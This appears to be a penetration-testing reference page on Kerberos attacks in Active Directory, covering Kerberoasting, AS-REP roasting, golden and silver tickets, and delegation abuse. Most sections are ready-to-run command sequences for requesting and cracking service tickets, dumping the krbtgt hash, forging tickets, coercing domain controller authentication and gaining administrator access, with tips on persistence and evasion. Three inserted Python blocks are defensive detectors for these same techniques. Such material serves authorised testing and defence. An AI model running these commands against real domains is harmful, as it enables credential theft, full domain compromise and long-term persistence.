Exploitation

Kerberos Attacks

Exploit Kerberos authentication weaknesses to obtain service account credentials, forge tickets, and escalate privileges.

Tool Installation

  • GetUserSPNs - Part of Impacket suite - pip install impacket
  • Rubeus - Windows Kerberos toolkit - github.com/GhostPack/Rubeus
  • Mimikatz - Credential extraction - github.com/gentilkiwi/mimikatz
  • Hashcat - GPU hash cracking - hashcat.net

Kerberoasting

Request TGS tickets for service accounts and crack them offline. Any domain user can request tickets for SPNs.

Why It Works:

  • TGS tickets are encrypted with the service account's NTLM hash
  • Any authenticated user can request a TGS for any SPN
  • The ticket can be cracked offline without triggering lockouts
  • Service accounts often have weak passwords and high privileges

High-Value Targets:

  • MSSQL - Database service accounts
  • Exchange - Often have Domain Admin privs
  • IIS - Web service accounts
  • Custom SPNs - Admin-created service accounts

GetUserSPNs (Impacket)

```bash
# List all SPNs (enumerate first)
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP

# Request TGS tickets and save to file
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request -outputfile kerberoast.txt

# Target specific high-value user
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request-user sqlservice

# Use with hash (PtH)
GetUserSPNs.py corp.local/user -hashes :NTLM_HASH -dc-ip DC_IP -request

# Output in hashcat format (default)
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request -outputfile hashes.txt

# Output in john format
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request -outputfile hashes.txt -format john
```

Rubeus (Windows)

Rubeus is the go-to Windows tool for Kerberos attacks. Download pre-compiled from GitHub releases.

```powershell
# Kerberoast all SPNs
Rubeus.exe kerberoast /outfile:hashes.txt

# Kerberoast with RC4 downgrade (easier to crack)
# Forces RC4 encryption instead of AES
Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt

# Target specific user
Rubeus.exe kerberoast /user:sqlservice /outfile:hashes.txt

# Kerberoast with alternate credentials
Rubeus.exe kerberoast /creduser:CORP\user /credpassword:pass

# Filter by encryption type
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt  # Only RC4
Rubeus.exe kerberoast /aes /outfile:hashes.txt       # Include AES
```

Tip

RC4 vs AES: RC4 (etype 23) hashes crack ~10-100x faster than AES256 (etype 18). Use /tgtdeleg to request RC4 tickets when possible.

Crack TGS Hashes

| Hash Type      | Hashcat Mode | Speed                 |
|----------------|--------------|-----------------------|
| TGS-REP RC4    | 13100        | ~500 MH/s (RTX 3090)  |
| TGS-REP AES128 | 19600        | ~10 MH/s              |
| TGS-REP AES256 | 19700        | ~5 MH/s               |

```bash
# Hashcat - Kerberos 5 TGS-REP (RC4) - Fastest
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt

# Hashcat - Kerberos 5 TGS-REP (AES256) - Slower
hashcat -m 19700 kerberoast.txt /usr/share/wordlists/rockyou.txt

# With rules for better coverage
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# John the Ripper
john --format=krb5tgs kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt
```
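The defender-side counterpart to the Kerberoasting workflow above. This is an added example, not code from the original page or from any of the tools it lists: it runs the two standard detections over Security Event 4769 (service ticket requested) records. The first flags RC4 (etype 0x17) ticket requests made by user accounts for non-machine SPNs, which is exactly what the /tgtdeleg downgrade produces; the second flags one account requesting many distinct SPNs within a short window, the signature of "roast everything" enumeration. The event tuples, account names, window and threshold are constructed assumptions.

```python
"""Kerberoasting detection over constructed Security Event 4769 records.

Each record is (timestamp, requesting account, service name, ticket encryption type),
a reduced form of the real event's TargetUserName / ServiceName / TicketEncryptionType.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType for RC4-HMAC; AES128 is 0x11, AES256 is 0x12

# Constructed sample events (not real logs).
SAMPLE_4769 = [
    ("2024-05-01T09:00:00", "alice", "krbtgt", 0x12),
    ("2024-05-01T09:00:02", "alice", "FS01$", 0x12),
    ("2024-05-01T09:05:00", "bob", "svc_sql", RC4_HMAC),
    ("2024-05-01T09:05:01", "bob", "svc_web", RC4_HMAC),
    ("2024-05-01T09:05:01", "bob", "svc_exchange", RC4_HMAC),
    ("2024-05-01T09:05:03", "bob", "svc_backup", RC4_HMAC),
    ("2024-05-01T09:05:04", "bob", "svc_iis", RC4_HMAC),
    ("2024-05-01T09:05:05", "bob", "svc_report", RC4_HMAC),
    ("2024-05-01T10:30:00", "carol", "legacy_app", RC4_HMAC),
    ("2024-05-01T11:00:00", "WS01$", "FS01$", RC4_HMAC),  # computer account, ignored
]


def is_service_account_target(service: str) -> bool:
    """True for SPNs owned by user (service) accounts: not a machine account, not krbtgt."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def rc4_service_requests(events):
    """(requester, service) pairs where a user account obtained an RC4 ticket for a
    service-account SPN. Machine accounts request RC4 legitimately for legacy hosts, so
    they are excluded to keep the signal usable."""
    hits = []
    for _, requester, service, etype in events:
        if requester.endswith("$"):
            continue
        if etype == RC4_HMAC and is_service_account_target(service):
            hits.append((requester, service))
    return hits


def burst_requesters(events, window=timedelta(minutes=5), threshold=5):
    """Accounts that requested tickets for >= threshold distinct service-account SPNs
    inside any sliding window of the given length. Returns {account: distinct SPNs}."""
    per_user = defaultdict(list)
    for ts, requester, service, _ in events:
        if requester.endswith("$") or not is_service_account_target(service):
            continue
        per_user[requester].append((datetime.fromisoformat(ts), service))

    flagged = {}
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            seen = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(seen) >= threshold:
                flagged[user] = len(seen)
                break
    return flagged


if __name__ == "__main__":
    for requester, service in rc4_service_requests(SAMPLE_4769):
        print(f"RC4 ticket for {service} requested by {requester}")
    for user, count in burst_requesters(SAMPLE_4769).items():
        print(f"{user} requested {count} distinct SPNs within 5 minutes")
```

Both checks need 4769 auditing enabled on every domain controller (Audit Kerberos Service Ticket Operations), and the RC4 check only has value once AES is enforced for service accounts so that legitimate RC4 traffic is rare.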

AS-REP Roasting

Target accounts with "Do not require Kerberos preauthentication" enabled. No authentication needed.

Finding AS-REP Roastable Accounts:

  • User must have DONT_REQ_PREAUTH flag set
  • Often set for legacy applications or misconfigurations
  • Can be queried with LDAP: userAccountControl:1.2.840.113556.1.4.803:=4194304
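The LDAP filter in the list above uses the extensible bitwise-AND matching rule (OID 1.2.840.113556.1.4.803) against userAccountControl; 4194304 is the DONT_REQ_PREAUTH bit (0x400000). As an added example (not from the original page or from any tool it names), the block below parses such a filter and evaluates it offline against constructed directory records, the way an audit script would triage an LDAP export for pre-authentication-disabled accounts. The user records and the include_disabled option are constructed assumptions; 1.2.840.113556.1.4.804 is the sibling bitwise-OR rule.

```python
"""Evaluate Active Directory bitwise LDAP filters against userAccountControl values."""
import re

# userAccountControl bits (see the flag list in [MS-ADTS] / KB305144)
ACCOUNTDISABLE = 0x2
DONT_REQ_PREAUTH = 0x400000  # 4194304
TRUSTED_FOR_DELEGATION = 0x80000

LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"
LDAP_MATCHING_RULE_BIT_OR = "1.2.840.113556.1.4.804"

# Matches the extensible-match form "(attr:OID:=value)" used by the page's filter.
_FILTER_RE = re.compile(r"^\((?P<attr>[A-Za-z0-9-]+):(?P<rule>[\d.]+):=(?P<value>\d+)\)$")

ASREP_FILTER = "(userAccountControl:1.2.840.113556.1.4.803:=4194304)"

# Constructed directory entries (not from any real domain).
SAMPLE_USERS = [
    {"sAMAccountName": "alice", "userAccountControl": 512},
    {"sAMAccountName": "svc_legacy", "userAccountControl": 512 | DONT_REQ_PREAUTH},
    {"sAMAccountName": "old_app", "userAccountControl": 512 | DONT_REQ_PREAUTH | ACCOUNTDISABLE},
    {"sAMAccountName": "svc_sql", "userAccountControl": 512 | 0x10000},  # DONT_EXPIRE_PASSWORD only
]


def parse_bitwise_filter(flt: str):
    """Split "(attr:rule:=value)" into (attr, rule OID, integer mask)."""
    m = _FILTER_RE.match(flt.strip())
    if not m:
        raise ValueError(f"not an extensible bitwise filter: {flt}")
    return m["attr"], m["rule"], int(m["value"])


def matches(entry: dict, flt: str) -> bool:
    """Apply the filter's bitwise rule to one directory entry."""
    attr, rule, mask = parse_bitwise_filter(flt)
    value = int(entry.get(attr, 0))
    if rule == LDAP_MATCHING_RULE_BIT_AND:
        return (value & mask) == mask  # every bit of the mask must be set
    if rule == LDAP_MATCHING_RULE_BIT_OR:
        return (value & mask) != 0     # any bit of the mask is enough
    raise ValueError(f"unsupported matching rule {rule}")


def asrep_roastable(users, include_disabled=False):
    """Names of accounts with DONT_REQ_PREAUTH set. Disabled accounts cannot obtain an
    AS-REP at all, so they are skipped unless the caller wants the full remediation list."""
    names = []
    for user in users:
        if not matches(user, ASREP_FILTER):
            continue
        if not include_disabled and user["userAccountControl"] & ACCOUNTDISABLE:
            continue
        names.append(user["sAMAccountName"])
    return names


if __name__ == "__main__":
    print("AS-REP roastable:", asrep_roastable(SAMPLE_USERS))
    print("including disabled:", asrep_roastable(SAMPLE_USERS, include_disabled=True))
```

The same parser evaluates the delegation filter (userAccountControl:1.2.840.113556.1.4.803:=524288) for TRUSTED_FOR_DELEGATION, which is why the constant is defined even though the AS-REP check does not use it.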

GetNPUsers (Impacket)

```bash
# Unauthenticated - requires username list
GetNPUsers.py corp.local/ -dc-ip DC_IP -usersfile users.txt -no-pass

# Authenticated - finds AS-REP accounts automatically
GetNPUsers.py corp.local/user:password -dc-ip DC_IP -request

# Output to file for cracking
GetNPUsers.py corp.local/ -dc-ip DC_IP -usersfile users.txt -no-pass -outputfile asrep.txt

# With hash (Pass-the-Hash)
GetNPUsers.py corp.local/user -hashes :NTLM_HASH -dc-ip DC_IP -request

# Enumerate all users first, then check
kerbrute userenum --dc DC_IP -d corp.local users.txt  # Find valid users
GetNPUsers.py corp.local/ -dc-ip DC_IP -usersfile valid_users.txt -no-pass
```

Rubeus AS-REP Roast

```powershell
# Find and roast AS-REP accounts
Rubeus.exe asreproast /outfile:asrep.txt

# Target specific user
Rubeus.exe asreproast /user:svc_backup /outfile:asrep.txt
```

Crack AS-REP Hashes

```bash
# Hashcat - Kerberos 5 AS-REP (mode 18200)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# With rules
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# John the Ripper
john --format=krb5asrep asrep.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

Warning

AS-REP vs Kerberoasting: AS-REP uses mode 18200, Kerberoasting uses 13100. Using the wrong mode will fail silently.

Golden Ticket

Forge TGT using the krbtgt hash. Provides unlimited access to all services in the domain.

Requirements:

  • krbtgt NTLM hash - From DCSync or NTDS.dit extraction
  • Domain SID - e.g., S-1-5-21-3623811015-3361044348-30300820
  • Domain name - FQDN (corp.local)

Tip

Persistence: Golden tickets remain valid until the krbtgt password is changed twice (to clear history). This is often never done, making it excellent for persistence.

Create Golden Ticket (Impacket)

```bash
# Step 1: Get domain SID
lookupsid.py corp.local/admin:password@dc.corp.local
# Or with PowerShell: (Get-ADDomain).DomainSID

# Step 2: Get krbtgt hash (requires Domain Admin or DCSync)
secretsdump.py corp.local/admin:password@dc.corp.local -just-dc-user krbtgt

# Step 3: Create golden ticket
ticketer.py -nthash <KRBTGT_HASH> -domain-sid S-1-5-21-... -domain corp.local Administrator

# Step 4: Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@target.corp.local
secretsdump.py -k -no-pass dc.corp.local  # DCSync with golden ticket
```

Golden Ticket with Mimikatz

```text
# Create and inject golden ticket directly
mimikatz# kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt

# Create ticket with specific groups (add to Domain Admins, etc.)
mimikatz# kerberos::golden /user:FakeAdmin /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /groups:512,513,518,519,520 /ptt

# Save ticket to file instead of injecting
mimikatz# kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ticket:golden.kirbi

# Verify ticket loaded
mimikatz# kerberos::list
klist  # Windows command

# Access any resource in the domain
dir \\dc.corp.local\c$
dir \\fileserver.corp.local\c$
```

Silver Ticket

Forge TGS for specific service using the service account hash. More targeted than Golden Ticket.

Silver vs Golden:

  • Golden: Access everything, requires krbtgt hash
  • Silver: Access specific service, requires service account hash
  • Silver tickets don't touch DC - harder to detect
  • Use machine account hash ($) for services running as SYSTEM

| Service     | SPN                   | Use Case                          |
|-------------|-----------------------|-----------------------------------|
| File Shares | cifs/host             | Access C$, ADMIN$, file shares    |
| WinRM       | http/host, wsman/host | PowerShell remoting               |
| SQL Server  | mssql/host            | Database access                   |
| LDAP        | ldap/host             | DCSync (on DC)                    |

```bash
# Create silver ticket for CIFS (file shares)
# Use machine account hash (TARGET$) from secretsdump
ticketer.py -nthash <MACHINE_HASH> -domain-sid S-1-5-21-... -domain corp.local -spn cifs/target.corp.local Administrator

# Silver ticket with Mimikatz
mimikatz# kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /target:target.corp.local /service:cifs /rc4:HASH /ptt

# Use the ticket
export KRB5CCNAME=Administrator.ccache
smbclient.py -k -no-pass corp.local/Administrator@target.corp.local

# Silver ticket for WinRM
ticketer.py -nthash <HASH> -domain-sid S-1-5-21-... -domain corp.local -spn http/target.corp.local Administrator
evil-winrm -i target.corp.local -r corp.local
```

Delegation Attacks

Kerberos delegation allows services to impersonate users to access other services. Misconfigured delegation is a common privilege escalation path.

Delegation Types:

  • Unconstrained - Can impersonate ANY user to ANY service (TrustedForDelegation)
  • Constrained - Can impersonate users to SPECIFIC services (msDS-AllowedToDelegateTo)
  • RBCD - Resource controls who can delegate TO it (msDS-AllowedToActOnBehalfOfOtherIdentity)
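The three delegation types above live in different places on the directory object: unconstrained delegation is the TRUSTED_FOR_DELEGATION bit (0x80000) in userAccountControl, constrained delegation is the msDS-AllowedToDelegateTo list (with TRUSTED_TO_AUTH_FOR_DELEGATION, 0x1000000, marking protocol transition), and RBCD is a non-empty msDS-AllowedToActOnBehalfOfOtherIdentity on the resource. The block below is an added example, not code from the original page or from findDelegation.py, that classifies constructed directory objects by those attributes and flags constrained-delegation entries whose target host is a domain controller regardless of the SPN's service class, since the service class in a delegated ticket is not validated (the SPN modification tip later on this page). Domain controllers carry TRUSTED_FOR_DELEGATION by default and are excluded from the unconstrained finding. The objects and DC list are constructed; the RBCD attribute is modelled as a list of principal names, whereas the real attribute is a binary security descriptor.

```python
"""Classify Kerberos delegation configuration from (constructed) AD object attributes."""

# userAccountControl bits
NORMAL_ACCOUNT = 0x200
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000          # set on domain controllers
TRUSTED_FOR_DELEGATION = 0x80000       # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained with protocol transition

# Constructed sample objects (not a real domain). The RBCD attribute is simplified to a
# list of principal names; in AD it is a security descriptor naming the allowed SIDs.
SAMPLE_OBJECTS = [
    {"name": "DC01$", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"name": "WEB01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"name": "svc_sql", "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/FS01.corp.local", "ldap/DC01.corp.local"]},
    {"name": "FS01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": ["WEB01$"]},
    {"name": "WS05$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT},
]
DOMAIN_CONTROLLERS = {"dc01.corp.local"}


def classify_delegation(obj: dict) -> list:
    """Return the delegation types configured on one object (empty list if none)."""
    uac = obj.get("userAccountControl", 0)
    findings = []
    if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
        findings.append("unconstrained")
    if obj.get("msDS-AllowedToDelegateTo"):
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append("constrained (protocol transition)")
        else:
            findings.append("constrained")
    if obj.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        findings.append("rbcd")
    return findings


def delegation_report(objects) -> dict:
    """{name: findings} for every object that has some form of delegation configured."""
    report = {}
    for obj in objects:
        findings = classify_delegation(obj)
        if findings:
            report[obj["name"]] = findings
    return report


def spn_host(spn: str) -> str:
    """Host part of 'class/host[:port]', lower-cased; the class is deliberately ignored."""
    host = spn.split("/", 1)[1] if "/" in spn else spn
    return host.split(":", 1)[0].lower()


def risky_constrained_targets(objects, domain_controllers) -> list:
    """(account, SPN) pairs where constrained delegation targets a domain controller host."""
    dcs = {dc.lower() for dc in domain_controllers}
    risky = []
    for obj in objects:
        for spn in obj.get("msDS-AllowedToDelegateTo", []):
            if spn_host(spn) in dcs:
                risky.append((obj["name"], spn))
    return risky


if __name__ == "__main__":
    for name, findings in delegation_report(SAMPLE_OBJECTS).items():
        print(f"{name}: {', '.join(findings)}")
    print("constrained delegation to a DC:", risky_constrained_targets(SAMPLE_OBJECTS, DOMAIN_CONTROLLERS))
```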

Unconstrained Delegation

When users authenticate to unconstrained delegation hosts, their TGT is cached. Coerce a DC to authenticate and capture its ticket.

```powershell
# Find unconstrained delegation computers
Get-ADComputer -Filter {TrustedForDelegation -eq $true}
Get-ADUser -Filter {TrustedForDelegation -eq $true}

# Impacket findDelegation
findDelegation.py corp.local/user:password -dc-ip DC_IP

# CrackMapExec module
crackmapexec ldap DC_IP -u user -p pass -M find_delegation

# On delegation host - extract cached tickets
mimikatz# sekurlsa::tickets /export

# Monitor for incoming tickets (Rubeus)
Rubeus.exe monitor /interval:5 /filteruser:DC$

# Coerce DC to authenticate (PrinterBug/PetitPotam)
python printerbug.py corp.local/user:password@DC DELEGATION_HOST
```

Constrained Delegation (S4U)

If you compromise an account with constrained delegation, you can impersonate ANY user to the allowed services.

```bash
# Find constrained delegation
findDelegation.py corp.local/user:password -dc-ip DC_IP

# Look for msDS-AllowedToDelegateTo attribute
Get-ADUser -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

# S4U2Self + S4U2Proxy attack
# Get service ticket as Administrator to the allowed SPN
getST.py -spn cifs/target.corp.local -impersonate Administrator corp.local/svc_sql:password

# With hash
getST.py -spn cifs/target.corp.local -impersonate Administrator -hashes :HASH corp.local/svc_sql

# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@target.corp.local
secretsdump.py -k -no-pass target.corp.local
```

Tip

SPN Modification: The target SPN in a delegated ticket can sometimes be modified. If delegation allows cifs/server, you may be able to change it to ldap/server for DCSync.

Resource-Based Constrained Delegation (RBCD)

RBCD lets you configure delegation ON the target resource. If you can write to msDS-AllowedToActOnBehalfOfOtherIdentity, you can compromise the target.

RBCD Requirements:

  • Write access to target's msDS-AllowedToActOnBehalfOfOtherIdentity
  • A computer account you control (or ability to create one)
  • Target must not be protected (Protected Users group)

```bash
# Step 1: Add computer account (any domain user can add up to 10)
addcomputer.py -computer-name YOURPC -computer-pass Password123 corp.local/user:password

# Step 2: Set RBCD attribute on target (requires write access)
rbcd.py -delegate-to TARGET$ -delegate-from YOURPC$ -dc-ip DC_IP corp.local/user:password -action write

# Alternative: Use PowerShell
Set-ADComputer TARGET -PrincipalsAllowedToDelegateToAccount YOURPC$

# Step 3: Get ticket via S4U as Administrator
getST.py -spn cifs/target.corp.local -impersonate Administrator corp.local/YOURPC$:Password123

# Step 4: Use ticket
export KRB5CCNAME=Administrator.ccache
secretsdump.py -k -no-pass target.corp.local
psexec.py -k -no-pass target.corp.local
```
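Steps 1 and 2 of the RBCD procedure above each produce a directory-service audit record: creating a computer account logs Event 4741, and writing msDS-AllowedToActOnBehalfOfOtherIdentity logs Event 5136 when Directory Service Changes auditing and a SACL on the object are in place. The block below is an added detection example, not code from the original page or from rbcd.py: it lists RBCD attribute writes, flags writers outside an allow-list of accounts expected to manage delegation, and correlates the tell-tale sequence of the same principal creating a computer account and then writing RBCD on another object shortly afterwards. The events, the allow-list and the 24-hour window are constructed assumptions; real 4741/5136 records carry more fields than modelled here.

```python
"""Detect RBCD abuse patterns from constructed 4741 (computer account created) and
5136 (directory object modified) events."""
from collections import defaultdict
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
AUTHORISED_RBCD_EDITORS = {"adm.sccm"}  # constructed allow-list of delegation admins

SAMPLE_EVENTS = [
    {"id": 4741, "time": "2024-05-01T14:00:00", "subject": "jdoe",
     "object": "CN=YOURPC,CN=Computers,DC=corp,DC=local"},
    {"id": 5136, "time": "2024-05-01T14:02:00", "subject": "jdoe",
     "object": "CN=TARGET,OU=Servers,DC=corp,DC=local", "attribute": RBCD_ATTR, "operation": "Value Added"},
    {"id": 5136, "time": "2024-05-01T15:00:00", "subject": "adm.sccm",
     "object": "CN=APP02,OU=Servers,DC=corp,DC=local", "attribute": RBCD_ATTR, "operation": "Value Added"},
    {"id": 5136, "time": "2024-05-01T15:10:00", "subject": "jdoe",
     "object": "CN=WS07,CN=Computers,DC=corp,DC=local", "attribute": "description", "operation": "Value Added"},
]


def _t(value: str) -> datetime:
    return datetime.fromisoformat(value)


def rbcd_writes(events):
    """All 5136 events that add a value to the RBCD attribute."""
    return [e for e in events
            if e["id"] == 5136 and e["attribute"] == RBCD_ATTR and e["operation"] == "Value Added"]


def unauthorised_rbcd_writes(events, allowed):
    """(subject, object DN) for RBCD writes by principals outside the allow-list."""
    return [(e["subject"], e["object"]) for e in rbcd_writes(events) if e["subject"] not in allowed]


def rbcd_after_account_creation(events, window=timedelta(hours=24)):
    """(subject, created computer DN, RBCD target DN) where the same subject created a
    computer account and then wrote RBCD on a different object within the window."""
    created = defaultdict(list)
    for e in events:
        if e["id"] == 4741:
            created[e["subject"]].append((_t(e["time"]), e["object"]))
    chains = []
    for write in rbcd_writes(events):
        when = _t(write["time"])
        for made_at, computer_dn in created[write["subject"]]:
            if timedelta(0) <= when - made_at <= window and computer_dn != write["object"]:
                chains.append((write["subject"], computer_dn, write["object"]))
    return chains


if __name__ == "__main__":
    print("unauthorised RBCD writes:", unauthorised_rbcd_writes(SAMPLE_EVENTS, AUTHORISED_RBCD_EDITORS))
    print("create-then-delegate chains:", rbcd_after_account_creation(SAMPLE_EVENTS))
```

The preventive controls sit next to the detections: setting ms-DS-MachineAccountQuota to 0 removes step 1 for ordinary users, and reviewing who holds write access to computer objects removes step 2.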

Tip

Kerberoasting and AS-REP Roasting are low-noise attacks that don't trigger account lockouts. They should be part of every internal pentest.

External Resources